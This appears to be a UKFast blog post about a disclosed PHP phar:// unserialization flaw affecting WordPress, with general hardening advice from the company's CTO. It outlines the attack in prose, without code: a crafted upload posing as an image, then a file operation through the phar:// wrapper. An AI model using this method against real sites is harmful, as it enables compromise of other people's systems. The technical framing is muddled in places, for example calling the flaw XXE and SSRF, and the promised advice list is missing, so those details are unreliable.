Recently we brought you the breaking news story of the new WordPress vulnerability. The flaw was discovered by Sam Thomas, Director of Research, at UKFast’s sister company Secarma and was announced at Black Hat in Las Vegas, as well as the BSides MCR event last month.
The vulnerability, which is used within the current WordPress PHP framework, can affect almost 30% of all sites on the web and is not currently being addressed. Watch the full Secarma talk here.
But what steps could you take to minimise the risk of a breach to your site?
We spoke to UKFast CTO Neil Lathwood, who gives you his thoughts on the glitch and adds some advice for those wishing to protect themselves against the dangerous flaw.
The PHP vulnerability allows attackers to exploit flaws within WordPress’ PHP framework, which could result in a complete system compromise. The vulnerability is not limited to WordPress sites and can affect others that use this same PHP framework. However, WordPress accounts for 26% of the entire web’s eCommerce sites, with 30% of the world’s top 1000 websites vulnerable to hacking and data breaches as a result.
The exploit offers a previously undiscovered way to expose “unserialization” in the platform’s code using eXternal Entity (XXE – XML) and Server Side Request Forgery (SSRF).
An attacker uploads a specially crafted file onto the target application, posing as a normal picture or document file, for example. The hacker then triggers a file operation through a crafted file name –which accesses the file through the “phar://” stream wrapper – causing the target application to “unserialize” metadata contained in the file. Unserialization of attacker-controlled data is a known critical vulnerability, potentially resulting in the execution of malicious code.
WordPress was informed of the issue in February 2017 but has yet to take action.
Basically, anyone who runs a WordPress site. While this vulnerability requires a login to WordPress, weak passwords and phishing mean that your user accounts could be compromised. However, the flaw is not limited to WordPress and affects other websites that use this structure.
The usual security advice is paramount here and needs to be applied rigorously to avoid any problems to your site when it comes to this vulnerability:
This is a constantly changing landscape and known vulnerabilities are being addressed by vendors and the open source community daily. Things like WAFs (Web Application Firewalls) can help mitigate against vulnerabilities yet to be discovered, and if you are not running a WAF in front of your web application then you should consider doing so.
WordPress is actually a lot more secure today than it used to be and the core code is audited to identify issues like this. WordPress plugins on the other hand are where users need to be concerned.
Speak to a UKFast security expert to find out more on protecting your solution